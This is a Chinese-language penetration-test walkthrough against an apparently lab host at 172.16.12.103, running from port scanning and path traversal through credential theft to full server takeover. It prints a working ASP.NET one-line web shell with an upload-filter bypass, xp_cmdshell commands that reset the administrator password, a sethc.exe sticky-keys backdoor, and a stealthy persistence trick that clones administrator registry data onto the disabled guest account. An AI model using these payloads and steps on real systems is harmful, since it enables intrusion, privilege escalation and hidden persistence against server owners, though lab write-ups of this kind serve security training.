目錄
- 信息收集-端口探測
- 目錄掃描
- 連接數據庫
- 文件上傳
- 一句話Getshell
- 權限提升
- 權限維持
【目標網站:172.16.12.103】
滲透全過程
1.信息收集-端口探測
1)Nmap端口探測:namp -sS -p 1-65535 172.16.12.103
可以看到端口開放情況
2.判斷系統情況
根據端口情況初步判定為IIS+mssql+.net系統,訪問web站點URL應該為:http:172.16.12.103:27689
訪問網站出現登入框
這里想到直接使用admin爆破一波,但是沒爆破出來,估計密碼復雜,於是只有另辟蹊徑
3.網站目錄掃描
御劍、burpsuite進行目錄掃描,burpsuite的掃描類似爆破套路,這里直接使用御劍掃描
只有兩個目錄可以訪問,其它需要登入驗證后授權。
1)訪問/robots,txt目錄出現下面幾個目錄,都需要登入,其中/admin/file_down.aspx報錯。
2)訪問/admin/file_down.aspx目錄報錯信息如下
看到源文件路徑,訪問參數為file,聯想到是否存在mssql根目錄下的web.config文件
4.通過file參數訪問web.config文件尋找可用數據
http://172.16.12.103:27689/admin/file_down.aspx?File=../../web.config(注意:這里上級目錄為/admin,再跳一次就為根目錄了)
直接可以下載web.config文件,打開XML文件查看直接看到數據庫賬號/密碼:down/downsql
5.連接數據庫
使用工具navicat連接數據庫,嘗試查找數據庫中web的賬號密碼
1)連接數據庫
2)可視化管理軟件,直接查表,就不用sql語句查詢,查看一個UserLists表,查看得到admin密碼為adfasdfsadfef
6.使用admin賬號登入web登錄框
7.找到上傳點,上傳木馬
部署在IIS上的為asp.net,直接上傳asp.net的一句話:
<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>
頭添加GIF89a識別文件頭為GIF,避免內容檢測不通過
1)第一次上傳解析不成功
修改后綴為aspx無法上傳,大小寫、雙寫等繞不過(各種嘗試),只能上傳.aspx.jpg形式的
上傳a.aspx.jpg文件成功,但是無法解析為aspx文件
2)查看”管理文件上傳”,提示文件名達到32位字符會被截取作為文件名,觀察例子,當文件名字符為13位后都被截取,那么想到可以截掉.jpg部分就可以識別為aspx
上傳文件為aaaaaaaa.aspx.jpg的一句話成功截斷為aspx
3)找上傳路徑,判斷是否解析成功,burp中未找到,源碼沒有,”管理上傳文件”中查文件找到一個報錯信息看到路徑為/upfile/affix/
訪問文件,解析成功
8.使用菜刀連接getshell
1)配置菜刀
2)連接數據庫成功
3)通過虛擬終端查看權限
Whoami查看明顯權限不夠
9.mssql提升權限
基本思路就是新建用戶添加到administrator,開啟3389,最后遠程連接服務器。
使用xp_cmdshell嘗試提權,使用編輯器新建用戶加入adminnistrator失敗,提示無權限進行創建賬號
第一種提權:提升net.exe或者net1.exe的權限,然后新建用戶
1)提升net.exe的權限
命令:exec xp_cmdshell 'echo y|cacls net.exe /g system:f'
2)重置administrator賬號密碼
命令:exec xp_cmdshell 'net user administrator gooann'
3)開啟遠程3389,直接使用administrator賬號遠程到服務器。
第二種提權方法:
1)使用xp_cmdshell命令,sethc復制cmd.exe,形成shif后門,可以遠程到機器后進行利用;這里相當於我按住5次shif就粘貼cmd.exe了,可以在遠程服務器界面使用。
命令:exec xp_cmdshell 'attrib -s -r -h sethc.exe && copy cmd.exe
2)上傳開啟3389遠程的3389.bat,在虛擬終端中執行
3)遠程到目的服務器,利用shift后門
按住5次shift后將出現cmd就會粘貼到桌面
4)Whoami查看一下權限為system權限,接下來想辦法能進入圖形化界面
4)進入圖形化界面
直接在cmd中輸入:explorer.exe進入windows可視化界面,也就是進入桌面
10.權限維持幾種方法
1)圖形化界面直接修改賬號密碼;
2)新建一個用戶;
3)修改注冊表,將administrator賬號的注冊表信息復制到禁用的guest賬號,這時候禁用的guset賬號還是可以使用,這種方法就很隱蔽了。